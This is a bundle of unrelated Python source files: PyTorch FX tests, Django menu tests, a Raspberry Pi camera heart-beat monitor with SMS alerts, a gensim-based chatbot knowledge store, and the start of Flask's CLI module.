def test_graph_module_init_buffer_param_copied_mod_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=False)
def test_annotations_with_no_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, a: A) -> torch.Tensor:
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor':
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor:
return a(x[0])
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor':
return a(x)[0]
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
@unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature "
"`annotations` is not defined in Python <3.7")
def test_annotation_with_future(self):
try:
import fx.test_future # noqa: F401
finally:
del sys.modules["__future__"]
@skipIfNoTorchVision
def test_cpatcher(self):
cnt = 0
def patched_impl(to_patch, args, kwargs):
nonlocal cnt
cnt += 1
return to_patch(*args, **kwargs)
c_patch_enabled = True
def patched_in(to_patch, args, kwargs):
nonlocal c_patch_enabled
try:
c_patch_enabled = False
r = patched_impl(to_patch, args, kwargs)
finally:
c_patch_enabled = True
return r
def trace_func(frame, action, arg):
if action == 'c_call':
if c_patch_enabled:
torch._C._fx.patch_function(arg, patched_in)
import torch
from torchvision.models.resnet import resnet18
rn = resnet18()
try:
sys.setprofile(trace_func)
rn(torch.rand(1, 3, 224, 224))
print("testing print patch")
finally:
sys.setprofile(None)
assert(cnt != 0)
def test_randn(self):
def f():
return torch.randn(3, 3)
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=False)
assert(all(i.target != torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
def run_getitem_target():
from torch.fx.symbolic_trace import _wrapped_methods_to_patch
_wrapped_methods_to_patch.append((torch.Tensor, "__getitem__"))
try:
TestFX().getitem_inner()
finally:
_wrapped_methods_to_patch.pop()
class TestOperatorSignatures(JitTestCase):
@onlyCPU
@ops(op_db, allowed_dtypes=(torch.float,))
def test_get_torch_func_signature_exhaustive(self, device, dtype, op):
known_no_schema = {'stack', 'hstack', 'vstack', 'dstack', 'repeat', '__getitem__', 'linalg.multi_dot'}
try:
sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False)
schemas = get_signature_for_torch_op(op.op)
if not schemas:
raise RuntimeError('No Schemas Returned')
for sample_input in sample_inputs_itr:
# Iterate through overloads until we hit a match. If we exit this
# loop via `else`, we haven't found a match
for schema in schemas:
try:
bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs)
bound_args.apply_defaults()
op(*bound_args.args, **bound_args.kwargs)
break
except TypeError as e:
pass
else:
raise RuntimeError(f'Did not match any schemas for op {op.name}!')
except Exception as e:
assert op.name in known_no_schema
instantiate_device_type_tests(TestOperatorSignatures, globals())
if __name__ == '__main__':
run_tests()
|
test_menu.py
|
import signal
import threading
import unittest
import sys
if sys.version_info > (3, 0):
from queue import Queue
else:
from Queue import Queue
from django.conf import settings
from django.template import Template, Context
from django.test import TestCase
from django.test.client import RequestFactory
from menu import Menu, MenuItem
# XXX TODO: test MENU_HIDE_EMPTY
class CustomMenuItem(MenuItem):
"""
Custom MenuItem subclass with custom check logic
"""
def check(self, request):
"""
We should be visible unless the request path ends with "foo"
"""
self.visible = not request.path.endswith("foo")
class MenuTests(TestCase):
"""
Tests for Menu
"""
def setUp(self):
"""
Build some menus for our tests
"""
self.kids3_2_desired_title = None
def kids3_2_title(request):
"Allow the title of kids3-2 to be changed"
if self.kids3_2_desired_title is not None:
return "-".join([request.path, self.kids3_2_desired_title])
return 'kids3-2'
def kids2_2_check(request):
"Hide kids2-2 whenever the request path ends with /hidden"
if request.path.endswith('/hidden'):
return False
return True
# Ensure we can pass children as tuples (or other iterables, like generators)
# Following the implementation of sorted children there was a bug reported due to children
# being passed as a tuple, which has no .sort method
# See: https://github.com/borgstrom/django-simple-menu/issues/38
def kids2():
"Generator for kids2"
class RepeatIterator(object):
"We need this to be reusable -- http://stackoverflow.com/a/1985733"
def __iter__(self):
yield MenuItem("kids2-1", "/parent2/kids2-1", weight=999)
yield MenuItem("kids2-2", "/kids2-2", check=kids2_2_check)
return RepeatIterator()
def kids3_1(request):
"Callable for kids3-1"
return [
MenuItem("kids3-1-1", "/parent3/kids3-1/kid1", exact_url=True),
]
kids3 = (
CustomMenuItem("kids3-1", "/parent3/kids3-1", children=kids3_1, slug="salty"),
CustomMenuItem(kids3_2_title, "/parent3/kids3-2")
)
Menu.items = {}
Menu.sorted = {}
Menu.loaded = False
# add our items. because we set weight to 999 for parent 1 it will become the last child
# even though it's added first
Menu.add_item("test", MenuItem("Parent 1", "/parent1", weight=999))
Menu.add_item("test", MenuItem("Parent 2", "/parent2", children=kids2()))
Menu.add_item("test", MenuItem("Parent 3", "/parent3", children=kids3))
self.factory = RequestFactory()
def test_custom_menuitem(self):
"""
Ensure our custom check on our custom MenuItem works
"""
request = self.factory.get('/parent3/kids3-1')
items = Menu.process(request, 'test')
self.assertEqual(len(items[1].children), 2)
request = self.factory.get('/parent3/kids3-1/foo')
items = Menu.process(request, 'test')
self.assertEqual(len(items[1].children), 0)
def test_thread_safety_and_checks(self):
"""
Ensure our thread safety works, this also ensures our checks work
"""
# this shouldn't ever take more than 5 seconds, add a safety in case someting breaks
signal.alarm(5)
def t1(results):
"Closure for thread 1"
request = self.factory.get('/kids2-2/visible')
items = Menu.process(request, 'test')
results.put_nowait(len(items[0].children) == 2)
def t2(results):
"Closure for thread 2"
request = self.factory.get('/kids2-2/hidden')
items = Menu.process(request, 'test')
results.put_nowait(len(items[0].children) == 1)
results = Queue()
for _ in range(50):
threads = [
threading.Thread(target=t1, args=(results,)),
threading.Thread(target=t2, args=(results,))
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertTrue(all([
results.get()
for _ in range(100)
]))
def test_slug(self):
"""
Ensure our slugification works as expected
"""
request = self.factory.get('/parent3/kids3-1')
items = Menu.process(request, 'test')
self.assertEqual(items[1].slug, "parent-3")
self.assertEqual(items[1].children[0].slug, "salty")
def test_exact_url(self):
"""
Ensure that the exact_url setting works
"""
# the extra stuff will still cause kids3-2 to be selected
request = self.factory.get('/parent3/kids3-2/extra_stuff_here')
items = Menu.process(request, 'test')
self.assertEqual(items[1].children[1].selected, True)
# but here it won't, because exact_url is set
request = self.factory.get('/parent3/kids3-1/kid1/extra_stuff_here')
items = Menu.process(request, 'test')
self.assertEqual(items[1].children[0].children[0].selected, False)
def test_callable_title(self):
"""
Ensure callable titles work
"""
self.kids3_2_desired_title = "fun"
request = self.factory.get('/parent3')
items = Menu.process(request, 'test')
self.assertEqual(items[1].children[1].title, "/parent3-fun")
def test_select_parents(self):
"""
Ensure the MENU_SELECT_PARENTS setting works
"""
settings.MENU_SELECT_PARENTS = False
request = self.factory.get('/parent2/kids2-1')
items = Menu.process(request, 'test')
self.assertEqual(items[0].selected, True)
self.assertEqual(items[0].children[1].selected, True)
self.assertEqual(items[1].selected, False)
request = self.factory.get('/kids2-2')
items = Menu.process(request, 'test')
self.assertEqual(items[0].selected, False)
self.assertEqual(items[0].children[0].selected, True)
self.assertEqual(items[1].selected, False)
settings.MENU_SELECT_PARENTS = True
request = self.factory.get('/kids2-2')
items = Menu.process(request, 'test')
self.assertEqual(items[0].selected, True)
self.assertEqual(items[0].children[0].selected, True)
self.assertEqual(items[1].selected, False)
request = self.factory.get('/parent3/kids3-1/kid1')
items = Menu.process(request, 'test')
self.assertEqual(items[0].selected, False)
self.assertEqual(items[0].children[1].selected, False)
self.assertEqual(items[1].selected, True)
self.assertEqual(items[1].children[0].selected, True)
self.assertEqual(items[1].children[0].children[0].selected, True)
self.assertEqual(items[1].children[1].selected, False)
self.assertEqual(items[2].selected, False)
def test_template_tag(self):
"""
Ensure the templating works
"""
request = self.factory.get('/parent3/kids3-1')
out = Template(
"{% load menu %}"
"{% generate_menu %}"
"{% for item in menus.test %}"
"{{ item.title }},"
"{% for child in item.children %}"
"{{ child.title }},"
"{% for grandchild in child.children %}"
"{{ grandchild.title }},"
"{% endfor %}"
"{% endfor %}"
"{% endfor %}"
).render(Context({
'request': request,
}))
self.assertEqual(out, "Parent 2,kids2-2,kids2-1,Parent 3,kids3-1,kids3-1-1,kids3-2,Parent 1,")
def test_template_tag_missing_attribute(self):
"""
Missing attributes should not raise exceptions in templates
"""
request = self.factory.get('/parent2/kids2-1')
out = Template(
"{% load menu %}"
"{% generate_menu %}"
"{% for item in menus.test %}"
"{{ item.title }}{{ item.doesntexist }},"
"{% endfor %}"
).render(Context({
'request': request,
}))
self.assertEqual(out, "Parent 2,Parent 3,Parent 1,")
class MenuItemTests(TestCase):
"""
Tests for MenuItem
"""
def test_kwargs(self):
"""
MenuItems should accept arbitrary keyword args
"""
item = MenuItem("test", "/test", arbitrary=True, dictionary={'a': 1})
self.assertTrue(item.arbitrary)
self.assertEqual(item.dictionary, {'a': 1})
self.assertRaises(AttributeError, lambda: item.nope)
|
heart_beat.py
|
# Set up a Message Queue server, which will receive images
# every N-minutes, and heart beat signals every N-seconds.
# New images will be stored on SD Card for forensics, and old images deleted to remove clutter/save space
# Heart beats will be used to determine if camera stream is alive (it may
# need to be restarted on some camera models).
# Log and notify admin when camera needs to be restarted.
# Usage: python heart_beat.py
import os
import pandas as pd
import imagezmq
import cv2
import traceback
import sys
import logging
from os import path, mkdir
import subprocess
import config
import time
import threading
from models import HeartBeat
from datetime import datetime, timedelta
from database import Session
from twilio.rest import Client
def is_healthy(heart_beat: HeartBeat) -> bool:
"""
Generate status based on if the heart beat occurred within
last N-seconds, as per config setting.
If True is returned, then heart beat is ok, otherwise video stream
has been in idle mode for too long.
"""
max_age = datetime.now() - timedelta(seconds=config.HEART_BEAT_INTERVAL_MAX_IDLE_N_SEC)
return heart_beat.create_ts >= max_age
def fetch_last_heart_beat() -> HeartBeat:
"""Get last HeartBeat recorded in the DB"""
return (Session
.query(HeartBeat)
.order_by(HeartBeat.create_ts.desc())
.first())
def hear_beat_monitor():
"""
Keep running a heart beat every N-seconds:
- Check if images need to be archived
- If heart beat is not detected in N-seconds, restart video capture process
"""
SLEEP_TIME = 30
prev_day = None
while True:
logging.debug('Heart beat triggered')
# ====================================
# === Delete old heart beat images ===
# ====================================
curr_day = datetime.now().day
if curr_day != prev_day:
logging.info('Check for old heart-beat image candidates for deletion')
# find all folders with images
all_im_folders = os.listdir(config.IMG_FOLDER)
# calculate dates to keep based on configuration
now = datetime.now()
min_date = now - timedelta(days=config.USE_HISTORICAL_DAYS)
keep_dates = [str(dt.date()) for dt in pd.date_range(min_date, now)]
# figure out candidates for image deletion
del_dirs = [dt for dt in all_im_folders if dt not in keep_dates]
# walk through old directories and remove heart beat images
for dt in del_dirs:
logging.info(f'Checking folder for old heart beat images: {dt}')
dt_dir = f'{config.IMG_FOLDER}/{dt}'
for f in [f for f in os.listdir(dt_dir) if config.HEART_BEAT_FILES_IDENTIFIER in f]:
logging.info(f'Delete file: {f}')
os.unlink(f'{dt_dir}/{f}')
# set prev day to curr day
prev_day = curr_day
# ==================================
# === Detect frozen video stream ===
# ==================================
# grab last heart beat from the DB
last_heart_beat = fetch_last_heart_beat()
# determine if last heart beat occurred within specified time
heart_beat_status = is_healthy(last_heart_beat)
# if heart beat is not healthy - trigger notification
if not heart_beat_status:
# send text alert to admin
logging.info('Sending SMS Notification (heart beat detected frozen stream)')
try:
msg_body = f'Third Eye noticed a problem with the video stream. Backend process will be restarted'
client = Client(config.TWILIO_SID, config.TWILIO_AUTH_TOKEN)
for p in config.NOTIFY_PHONE_NUMBERS:
message = client.messages.create(body=msg_body, from_=config.TWILIO_PHONE_NUMBER, to=p)
sms_msg_sid = message.sid
logging.info(f'Message sent to Twilio, message id: {sms_msg_sid}')
except Exception as e:
logging.error(f'SMS error: {str(e)}')
# restart backend process
# construct command
CMD = f'/usr/bin/sudo /usr/bin/supervisorctl restart third-eye-backend'
logging.info(f'Executing cmd: {CMD}')
# execute CLI process
p = subprocess.Popen(CMD.split(' '), stdout=subprocess.PIPE)
out, err = p.communicate()
logging.info(str(out))
# wait for a while before going into next iteration
logging.debug(f'Waiting for {SLEEP_TIME} seconds')
time.sleep(SLEEP_TIME)
def main():
"""Collect messages from the message queue and save heart beats in the DB"""
try:
logging.info(f'Starting MQ server on {config.HEART_BEAT_SUB_URL}')
with imagezmq.ImageHub(open_port=config.HEART_BEAT_SUB_URL, REQ_REP=False) as image_hub:
logging.info(f'Ready to collect messages')
# keep track of current minute, as files will be saved once per minute
prev_min = None
while True: # receive images until Ctrl-C is pressed
dev_name, image = image_hub.recv_image()
# logging.debug(f'Heart beat received from {dev_name} with image shape {image.shape}')
# get current date/time
now = datetime.now()
# make sure we only save 1 file per minute (to save some space on the Pi)
curr_min = now.minute
if curr_min != prev_min:
date_folder = f'{config.IMG_FOLDER}/{str(now.date())}'
if not path.exists(date_folder):
mkdir(date_folder)
# save image in the images folder on each new minute
img_name = f"{str(now)[11:].replace(':', '')}_{config.HEART_BEAT_FILES_IDENTIFIER}.jpg"
cv2.imwrite(f'{date_folder}/{img_name}', image)
logging.info(f'Saving Heart-Beat file: {date_folder}/{img_name}')
prev_min = curr_min
# save heart beat in the DB
hb = HeartBeat(create_ts=datetime.now(), im_filename=f'{date_folder}/{img_name}')
Session.add(hb)
Session.commit()
except (KeyboardInterrupt, SystemExit):
pass # Ctrl-C was pressed to end program
except Exception as e:
logging.error(f'Python error with no Exception handler: {str(e)}')
logging.error(str(traceback.print_exc()))
finally:
sys.exit()
if __name__ == '__main__':
logging.basicConfig(format=config.LOGGING_FORMAT, level=config.LOGGING_LEVEL, datefmt=config.LOGGING_DATE_FORMAT)
logger = logging.getLogger()
# kick off hear_beat_monitor in a separate thread
t = threading.Thread(target=hear_beat_monitor)
t.daemon = True
t.start()
# kick off main message subscriber in the main thread
main()
|
mlbrain.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
from core import utils
import os
import codecs
import pickle
import threading
import logging
from time import sleep
import hashlib
from nltk.tokenize import RegexpTokenizer
from stop_words import get_stop_words
from gensim import corpora
import gensim
from core.progressbar import ProgressBar, Percentage, Bar, ETA, FormatLabel, AnimatedMarker
from modules.mlbendermodule import MLBenderModule
from modules.nlp.mlnlp import MLNLP
from modules.concept.mlconcept import MLConcept
from core.utils import simple_tokenize, multi_sent_tokenize
wordTokenizer = RegexpTokenizer(u'\w+')
brain_mutex = threading.Lock()
brain_add_mutex = threading.Lock()
def save_brain_data(data_storage_path, questions, answers, questions_indexed, answers_indexed):
"""
This function is used to save the brain-data in a separate thread during Bender operations.
The problem otherwise would be that, depending on data size, the user has to wait for his
response quite some time (until save is finished).
The reason: Once BenderCore receives an answer from a HumanLogic, it tells the brain and
other modules to "learn" new data. After this learning, the brain needs to save itself to
hard disk, otherwise the data would get lost. Since this call happens in BenderCore just
in the "getResponse"-call, the return of the response to the REST-API would need to wait
until this save has been done.
Therefore, we do it in a separate thread.
It has actually no drawback as the newly learned data is still in RAM and can immediately
be used for next requests... (quite different from how it works in TextSimilarity and WMD)
"""
logger = logging.getLogger(os.path.basename(sys.argv[0]))
logger.info('Updating BRAIN DATA. Trying to get a mutex-lock...')
brain_mutex.acquire()
logger.info('Updating BRAIN DATA. successfully got a mutex-lock...')
try:
utils.safe_create_directory(data_storage_path)
data_file = os.path.join(data_storage_path, 'knowledge-raw.pickle')
knowledge = {'questions': questions, 'answers': answers}
pickle.dump(knowledge, open(data_file, 'wb'))
data_file = os.path.join(data_storage_path, 'knowledge-indexed.pickle')
knowledge = {'questions': questions_indexed, 'answers': answers_indexed}
pickle.dump(knowledge, open(data_file, 'wb'))
logger.info('Updating BRAIN DATA: Successfully updated brain-data...')
finally:
brain_mutex.release()
def iter_dictionary_documents(top_directory, remove_stop_words=True, stop_words=None):
"""
Iterate over all documents, yielding a document (=list of utf8 tokens) at a time.
Updated: 2016-12-29 13:28 CET, ISO
Fixed so many bugs, unbelievable :-()
"""
global wordTokenizer
errfile = codecs.open('/tmp/dict-errs.txt', 'w', 'utf-8')
if remove_stop_words and not stop_words:
stop_words = get_stop_words('en')
for root, dirs, files in os.walk(top_directory):
counter = 0
widgets=[FormatLabel(' | File: %(message)s [%(value)s/'+str(len(files))+']'), ' ', Percentage(), ' ', Bar(marker='@', left='[', right=']'), ' ', ETA()]
files.sort()
pBar = ProgressBar(widgets=widgets, maxval=len(files)).start()
for filename in filter(lambda filename: filename.endswith('.txt'), files):
counter += 1
pBar.update(counter, filename)
filename = os.path.join(root, filename)
lines = codecs.open(filename, 'r', 'utf-8').readlines() # read the entire file as an array of strings
for line in lines:
if '\t' in line:
# we don't need the questionID for the moment...
questionID, content = line.split('\t')
else:
content = line
content = content.strip().lower()
# content = ' '.join(content.split('\n')).lower() # join lines into one big string (just to make sure)
try:
# tokens = wordTokenizer.tokenize(content)
tokens = gensim.utils.simple_preprocess(content)
if remove_stop_words is True:
stopped_tokens = [i for i in tokens if not i in stop_words]
else:
stopped_tokens = tokens
yield stopped_tokens
except:
print('Token error in file [', filename, ']', file=errfile)
pBar.finish()
errfile.close()
def convert_train_data(brain):
questions = brain.getAllQuestions()
for i, question in enumerate(questions):
tokens = multi_sent_tokenize(question.strip().lower().split('\n'), return_as_single_array = True)
# gensim has issues with German words that a bit longer than usual
# text = ' '.join(question.strip().lower().split('\n'))
# text = text.strip()
# tokens = gensim.utils.simple_preprocess(text)
question_id = str(i)
yield question_id, tokens
"""
TrainingCorpus is a memory-friendly corpus generator to be used for training only.
Created: 2016-04-28 ??:?? CET, ISO
"""
class TrainingCorpus(gensim.corpora.TextCorpus):
def __init__(self, brain, dictionary, remove_stop_words=True, stop_words=None, **kwargs):
super(TrainingCorpus, self).__init__(**kwargs)
self.brain = brain
self.dictionary = dictionary
self.remove_stop_words = remove_stop_words
self.stop_words = stop_words
def get_texts(self):
"""
Iterate over all documents, yielding a document (=list of utf8 tokens) at a time.
Updated: 2016-12-29 13:28 CET, ISO
Fixed so many bugs, unbelievable :-()
"""
global wordTokenizer
length = 0
questions = self.brain.getAllQuestions()
for i, question in enumerate(questions):
content = gensim.utils.to_utf8(' '.join(question.strip().lower().split('\n')).strip())
try:
tokens = gensim.utils.simple_preprocess(content)
# tokens = simple_tokenize(content)
if self.remove_stop_words is True:
stopped_tokens = [i for i in tokens if not i in self.stop_words]
else:
stopped_tokens = tokens
length += 1
yield stopped_tokens
except:
print('Token error in file [', content, ']')
self.length = length
"""
class DictionaryInitializer
Generates a dictionary from files
This is a memory-friendly version of a dictionary generator...
"""
class GensimDictionary(object):
def __init__(self, dictionary_data_root_dir, dictionary_filename, remove_stop_words=True, stop_words=None):
self.dict_filename = dictionary_filename
self.remove_stop_words = remove_stop_words
self.stop_words = stop_words
if not os.path.exists(dictionary_filename):
print(" | Generating dictionary from file %s..." % dictionary_data_root_dir)
self.dictionary = corpora.Dictionary(iter_dictionary_documents(dictionary_data_root_dir, remove_stop_words, stop_words))
self.dictionary.filter_extremes(no_below=0, no_above=0.1, keep_n=10000000)
# self.dictionary.compactify()
self.saveDictionary()
self.loadDictionary()
def saveDictionary(self):
self.dictionary.save(self.dict_filename)
def loadDictionary(self):
self.dictionary = corpora.Dictionary.load(self.dict_filename)
def addWords(self, textArray):
global wordTokenizer
documentsToAdd = []
for document in textArray:
text = ' '.join(document.strip().lower().split('\n'))
tokens = wordTokenizer.tokenize(text)
if self.remove_stop_words is True:
stopped_tokens = [i for i in tokens if not i in self.stop_words]
else:
stopped_tokens = tokens
documentsToAdd.append(stopped_tokens)
self.dictionary.add_documents(documentsToAdd, prune_at=None)
def getDictionary(self):
return self.dictionary
"""
Class MLBrain as described at:
https://wiki.ml.de/display/DJ/Bender+Brain
Copyright (c) 2019 Imdat Solak
All Rights Reserved
Created: 2017-04-29 10:32 CET, ISO
"""
class MLBrain(MLBenderModule):
def __init__(self, configDictionary):
super(MLBrain, self).__init__(configDictionary)
self.profile = {
"name" : "mlbrain-module",
"class" : "mlbrain"
}
self.nlp_module = None
self.concept_module = None
self.data_storage_path = utils.getKeyFromSectionInConfiguration('brain', 'data_storage_path', None, configDictionary)
self.dictionary_data_source_path = utils.getKeyFromSectionInConfiguration('bender-training', 'dictionary_data_source_path', None, configDictionary)
self.dictionary_output_path = utils.getKeyFromSectionInConfiguration('bender-training', 'dictionary_output_path', None, configDictionary)
if self.dictionary_output_path == None:
print('**** ERROR: No Dictionary output path defined in bender-training section of config-file.')
sys.exit(1)
self.dict_filename = os.path.join(self.dictionary_output_path, 'dictionary.dict')
self.remove_stop_words = int(utils.getKeyFromSectionInConfiguration('bender-training', 'remove_stop_words', '0', configDictionary))
self.language = utils.getKeyFromSectionInConfiguration('bender-training', 'data_language_short', 'en',configDictionary)
self.stop_words = get_stop_words(self.language)
utils.safe_create_directory(self.dictionary_output_path)
if self.data_storage_path == None:
print('**** ERROR: No data storage path specified. Exiting!')
sys.exit(1)
self.dictionary_manager = GensimDictionary(self.dictionary_data_source_path, self.dict_filename, self.remove_stop_words, self.stop_words)
self._loadData()
def initForBender(self, benderInstance):
self.benderCore = benderInstance
def _text_as_index(self, text):
global wordTokenizer
q = ' '.join(text.lower().split('\n'))
qArr = wordTokenizer.tokenize(q)
q = ' '.join(qArr)
return hashlib.sha256(q).hexdigest()
def _question_as_index(self, question):
return self._text_as_index(question)
def _answer_as_index(self, answer):
return self._text_as_index(answer)
def _addNewQAPair(self, question, answer, qType='e', qCategory = 1, mcugAnswers = {}):
"""
Same as 'batchAddNewQAPairs', except it works on a single QA-Pair
questionAnswerPair is a tuple (Q, A)
"""
if question != None and answer != None:
newQuestion = question
appendQuestion = False
appendAnswer = False
qIndexHash = self._question_as_index(question['question'])
if qIndexHash in self.questions_indexed.keys():
newQuestionID = self.questions_indexed[qIndexHash]
else:
newQuestionID = len(self.questions)
appendQuestion = True
aIndexHash = self._answer_as_index(answer)
# Do we alrady have the answer stored?
if aIndexHash in self.answers_indexed.keys():
# Yes, then throw away the data and just retrieve existing index
newAnswerID = self.answers_indexed[aIndexHash]
else:
# No? then we need to add it
newAnswerID = len(self.answers)
appendAnswer = True
if mcugAnswers == None:
mcugAnswers = {}
if appendQuestion:
newQuestion = question
newQuestion['answers'] = [newAnswerID]
newQuestion['qType'] = qType
newQuestion['category'] = qCategory
newQuestion['qID'] = newQuestionID
if 'answerID' in newQuestion.keys():
del newQuestion['answerID']
self.questions.append(newQuestion)
self.questions_indexed[qIndexHash] = newQuestionID
retAnswer = {'id': newAnswerID, 'answer': answer, 'mcugAnswers': mcugAnswers}
if appendAnswer:
self.answers.append(retAnswer)
self.answers_indexed[aIndexHash] = newAnswerID
return {newQuestionID: newQuestion}, retAnswer
else:
return None, None
def setNLPModule(self, nlpModule):
self.nlp_module = nlpModule
def setConceptModule(self, conceptModule):
self.concept_module = conceptModule
def addNewQAPair(self, questionAnswerPair, qType='e', qCategory=1, mcugAnswers={}):
brain_add_mutex.acquire()
question = {'question': questionAnswerPair[0]}
answer = questionAnswerPair[1]
qI, aI = self._addNewQAPair(question, answer, qType, qCategory, mcugAnswers)
if qI != None:
text = question['question'] + ' ' + answer
self.dictionary_manager.addWords([text])
self.dictionary_manager.saveDictionary()
self._saveData()
brain_add_mutex.release()
return qI, aI
else:
brain_add_mutex.release()
return None, None
def batchAddNewQAPairs(self, trainingData):
"""
Stores 'questions' and 'answers' in its internal storage as indexed pairs
IN:
trainingData = PICKLE Format as output by 'convert_csv.py' or similar
preparation tools
"""
questions = trainingData['questions']
answers = trainingData['defaultAnswers']
mcugAnswers = trainingData['mcugAnswers']
text = []
for question in questions:
qType = question['qType']
category = question['category']
answer = answers[question['answerID']]
mcugAnswer = mcugAnswers.get(str(question['answerID']), None)
self._addNewQAPair(question, answer, qType, category, mcugAnswer)
textLine = question['question'] + ' ' + answer
if mcugAnswer is not None:
for key in mcugAnswer.keys():
value = mcugAnswer[key]
textLine = textLine + ' ' + value
text.append(textLine)
self.dictionary_manager.addWords(text)
self.dictionary_manager.saveDictionary()
self._saveData()
return True
def _index_questions(self, questions):
result = {}
for i, entry in enumerate(questions):
hashIndex = self._question_as_index(entry['question'])
result[hashIndex] = i
return result
def _index_answers(self, answers):
result = {}
for i, entry in enumerate(answers):
hashIndex = self._answer_as_index(entry)
result[hashIndex] = i
return result
def _loadData(self):
self.questions = []
self.answers = []
self.questions_indexed = {}
self.answers_indexed = {}
data_file = os.path.join(self.data_storage_path, 'knowledge-raw.pickle')
if os.path.exists(data_file):
knowledge = pickle.load(open(data_file, 'rb'))
self.questions = knowledge['questions']
self.answers = knowledge['answers']
data_file = os.path.join(self.data_storage_path, 'knowledge-indexed.pickle')
if os.path.exists(data_file):
knowledge = pickle.load(open(data_file, 'rb'))
self.questions_indexed = knowledge['questions']
self.answers_indexed = knowledge['answers']
else:
self.questions_indexed = self._index_questions(self.questions)
self.answers_indexed = self._index_answers(self.answers)
knowledge = {'questions': self.questions_indexed, 'answers': self.answers_indexed}
pickle.dump(self.knowledge, open(data_file, 'wb'))
def _saveData(self):
# Because saving of the brain can take some time AFTER an update, we need to perform
# it in a separate thread.
# This is no problem as the thread itself is using a mutex-lock
a = []
a.extend(self.answers)
q = []
q.extend(self.questions)
qI = {}
qI.update(self.questions_indexed)
aI = {}
aI.update(self.answers_indexed)
save_thread = threading.Thread(target=save_brain_data, args=(self.data_storage_path, q, a, qI, aI))
save_thread.start()
def getAllQuestions(self):
return [qaPair['question'] for qaPair in self.questions]
def getAllAnswers(self):
return self.answers
def getAllQAPairs(self):
return self.questions
def getQuestionTexForQuestionID(self, questionID):
if questionID < len(self.questions):
return self.questions[questionID]['question']
else:
return None
def getAnswerIDsForQuestionID(self, questionID):
if questionID < len(self.questions):
return self.questions[questionID]['answers']
else:
return None
def getMCUGAnswerForQuestionID(self, questionID, client, channel=None, userGroup=None):
return None
def getMCUGAnswerForAnswerID(self, answerID, client, channel=None, userGroup=None):
return None
def getAnswerTextsForQuestionID(self, questionID):
if questionID < len(self.questions):
answerIDs = self.questions[questionID]['answers']
answers = []
for answerID in answerIDs:
answer = self.answers[answerID]
answers.append(answer['answer'])
return answers
else:
return None
def getAnswersForQuestionID(self, questionID):
if questionID < len(self.questions):
questionInfo = self.questions[questionID]
answerIDs = questionInfo['answers']
answers = []
for answerID in answerIDs:
anAnswer = self.answers[answerID]
anAnswer['qType'] = questionInfo.get('qType', 'e')
answers.append(anAnswer)
return answers
else:
return None
def getAnswerTextForAnswerID(self, answerID):
if answerID < len(self.answers):
return self.answers[answerID]
else:
return None
def getIDForQuestionText(self, questionText):
qIndexHash = self._question_as_index(questionText)
if qIndexHash in self.questions_indexed.keys():
return self.questions_indexed[qIndexHash]
else:
return None
def getQuestionCount(self):
return len(self.questions)
def getAnswerCount(self):
return len(self.answers)
def getDictionary(self):
return self.dictionary_manager.getDictionary()
def getIndicesForText(self, text):
"""
Returns an array of numbers consisting, in exactly the same order as the text, numbers representing the words.
If it encounters a word it doesn't know the index (number) will be "-1"
If you encounter such a word, you could first call the "addWordsToDictionary" with that word
and call indicesForText again.
;text; is just a full text in UTF-8 format
"""
global wordTokenizer
text = text.lower()
returnArray = []
try:
sentences = text.strip().lower().split('\n')
except:
return None
dictionaryTokens = self.getDictionary().token2id
for sentence in sentences:
row = []
for token in wordTokenizer.tokenize(sentence):
if token in dictionaryTokens:
row.append(dictionaryTokens[token])
else:
row.append(-1)
returnArray.append(row)
return returnArray
def getTextForIndices(self, indexArray):
"""
Returns a UTF-8 string representing the indices exactly in the same order as they appeared in the
indexArray. If the array contained an index that is out of the range of the module's dictionary,
the word in question will be "<__((UNKNOWN))__>"
;indexArray; is a two-dimensional array; 1D = sentence; 2D=words in the sentence
"""
returnArray = []
for sentence in indexArray:
newRow = ""
for i in range(len(sentence)):
wordID = sentence[i]
wordText = self.getDictionary().get(wordID, '<__((UNKNOWN))__>')
newRow = newRow + wordText + ' '
returnArray.append(newRow)
return returnArray
def getStopWordCleanedText(self, text):
global wordTokenizer
if self.remove_stop_words:
tokens = wordTokenizer.tokenize(text)
stopped_tokens = [i for i in tokens if not i.lower() in self.stop_words]
return ' '.join(stopped_tokens)
else:
return text
|
cli.py
|
# -*- coding: utf-8 -*-
"""
flask.cli
~~~~~~~~~
A simple command line application to run flask apps.
:copyright: © 2010 by the Pallets team.
:license: BSD, see LICENSE for more details.
"""
from __future__ import print_function
import ast
import inspect
import os
import re
import ssl
import sys
import traceback
from functools import update_wrapper
from operator import attrgetter
from threading import Lock, Thread
import click
from werkzeug.utils import import_string
from . import __version__
from ._compat import getargspec, itervalues, reraise, text_type
from .globals import current_app
from .helpers import get_debug_flag, get_env, get_load_dotenv
try:
import dotenv
except ImportError:
dotenv = None
class NoAppException(click.UsageError):
"""Raised if an application cannot be found or loaded."""
def find_best_app(script_info, module):
